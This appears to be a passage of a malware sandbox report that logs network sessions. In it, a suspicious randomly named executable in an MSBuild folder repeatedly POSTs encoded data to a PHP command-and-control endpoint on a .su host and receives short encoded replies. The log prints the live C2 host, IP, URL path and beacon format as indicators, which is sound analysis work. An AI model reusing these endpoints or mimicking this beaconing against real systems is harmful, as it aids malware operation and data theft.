                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:02.884018898 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:03.228266954 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:03.228669882 CET2548OUTData Raw: 51 5c 54 5d 5e 5a 50 51 5e 57 5a 51 57 5b 50 59 54 50 54 5b 56 54 57 54 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q\T]^ZPQ^WZQW[PYTPT[VTWTQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9D816W$ *'P*/<"^&+;[&<W6?4#<34&]/%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:03.764750957 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:03 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      28192.168.2.44977091.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:04.029393911 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:04.372209072 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:04.372600079 CET1872OUTData Raw: 51 59 54 58 5e 5b 55 5c 5e 57 5a 51 57 5f 50 5d 54 54 54 5f 56 54 57 5c 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QYTX^[U\^WZQW_P]TTT_VTW\QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9.11%39^$P6X/20^<%*8P!/8W6<,'$X&Z>/)%Z"!Q*1
                                                                                      Mar 6, 2024 09:53:04.743156910 CET435INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:04 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2d 04 25 5d 30 09 20 0d 3f 0c 2b 2e 2a 58 28 31 26 12 28 01 3d 5d 29 2f 04 15 3b 07 3f 0c 3d 2b 2c 18 34 06 33 09 22 21 3b 0c 25 39 20 5c 05 11 27 5e 30 32 31 1c 26 3a 00 05 24 31 00 06 25 2f 2b 09 28 02 25 02 33 29 2f 5d 23 0a 3f 0c 25 04 05 1d 27 06 3e 01 2f 2e 3b 5b 25 07 2d 54 02 17 21 0d 30 3d 34 5d 3f 1e 1a 04 31 31 35 1a 2a 03 3c 53 21 17 23 0e 36 20 31 5d 25 28 2e 5f 35 0c 3f 5c 2b 3b 37 12 27 3c 3c 50 32 2e 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98-%]0 ?+.*X(1&(=])/;?=+,43"!;%9 \'^021&:$1%/+(%3)/]#?%'>/.;[%-T!0=4]?115*<S!#6 1]%(._5?\+;7'<<P2.#U",R?\W0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      29192.168.2.44977191.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:04.153362989 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:04.496433020 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:04.496937037 CET2548OUTData Raw: 54 51 54 5d 5b 5d 55 55 5e 57 5a 51 57 5e 50 5d 54 57 54 5c 56 5e 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TQT][]UU^WZQW^P]TWT\V^W[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:,:$U!Z$6,!029Q6(Q"<<3$2</%Z"!Q*
                                                                                      Mar 6, 2024 09:53:04.869287014 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:04 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      30192.168.2.44977291.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:05.340676069 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:05.685585976 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:05.685894012 CET2548OUTData Raw: 54 5c 51 5b 5e 5d 55 53 5e 57 5a 51 57 51 50 59 54 57 54 58 56 55 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T\Q[^]US^WZQWQPYTWTXVUWUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9/2:V$:0-,.]38+Y&9!<(6<?0'7\1/:[,9%Z"!Q*
                                                                                      Mar 6, 2024 09:53:06.061042070 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:05 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      31192.168.2.44977391.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:06.530637026 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2544
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:06.871992111 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:06.872237921 CET2544OUTData Raw: 54 50 54 59 5b 56 55 5d 5e 57 5a 51 57 59 50 59 54 56 54 5f 56 59 57 5f 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TPTY[VU]^WZQWYPYTVT_VYW_QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9816T3*&6-?.'^8%)<Q6/8V5<?Y$]1?&Z/%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:07.242892981 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:07 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      32192.168.2.44977491.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:07.718955994 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:08.067553043 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:08.067934036 CET2548OUTData Raw: 51 59 54 51 5b 59 55 5d 5e 57 5a 51 57 50 50 5b 54 56 54 59 56 5a 57 5d 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QYTQ[YU]^WZQWPP[TVTYVZW]QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9D811'&$)8?&$;8%;!Z !/#'+^&"]8)%Z"!Q*
                                                                                      Mar 6, 2024 09:53:08.444546938 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:08 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      33192.168.2.44977591.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:08.932025909 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:09.277007103 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:09.277337074 CET2548OUTData Raw: 51 59 54 5f 5e 59 50 53 5e 57 5a 51 57 5a 50 5d 54 53 54 53 56 5e 57 5e 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QYT_^YPS^WZQWZP]TSTSV^W^QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9B8W*$#^$"-/'0':$",867]&$\&1/9%Z"!Q*%
                                                                                      Mar 6, 2024 09:53:09.652546883 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:09 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      34192.168.2.44977791.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:10.118127108 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:10.461328030 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:10.461596012 CET2548OUTData Raw: 54 5e 51 5e 5e 5c 50 50 5e 57 5a 51 57 5f 50 5b 54 55 54 5b 56 5d 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T^Q^^\PP^WZQW_P[TUT[V]WZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:,!U%35^'6\/$%_$T!8#<7X$?]2?%;%Z"!Q*1
                                                                                      Mar 6, 2024 09:53:10.829400063 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:10 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      35192.168.2.44977891.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:11.292047024 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:11.633332014 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:11.873644114 CET2548OUTData Raw: 54 50 51 5c 5e 5d 50 50 5e 57 5a 51 57 5e 50 5b 54 55 54 5c 56 5a 57 5f 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TPQ\^]PP^WZQW^P[TUT\VZW_QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:;1'#06/<.0+Z&/!Z8V67X3$7]%Z&Z,%Z"!Q*
                                                                                      Mar 6, 2024 09:53:12.241833925 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:12 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      36192.168.2.44977991.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:12.829269886 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:13.172041893 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:13.172352076 CET2548OUTData Raw: 54 50 54 5c 5b 5f 50 50 5e 57 5a 51 57 5b 50 5e 54 51 54 5f 56 5f 57 59 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TPT\[_PP^WZQW[P^TQT_V_WYQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9;*$ 5Z'5"-?$<2P6?<V6,+_3$+1,8)%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:13.546758890 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:13 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      37192.168.2.44978091.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:14.016043901 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:14.358999014 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:14.359235048 CET2548OUTData Raw: 54 59 54 51 5e 5d 55 57 5e 57 5a 51 57 5b 50 52 54 50 54 5e 56 5f 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TYTQ^]UW^WZQW[PRTPT^V_W[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9E,*30_8/*$(Y%9,6?+6/]&';X19,%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:14.734859943 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:14 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      38192.168.2.44978191.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:15.123253107 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:15.466053009 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:15.466387033 CET1872OUTData Raw: 54 51 51 59 5e 5e 55 52 5e 57 5a 51 57 58 50 5b 54 56 54 52 56 5a 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TQQY^^UR^WZQWXP[TVTRVZW[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9,"9' %\3%860;;Z1_'! "Z#3422]/9%Z"!Q*-
                                                                                      Mar 6, 2024 09:53:15.839705944 CET435INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:15 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
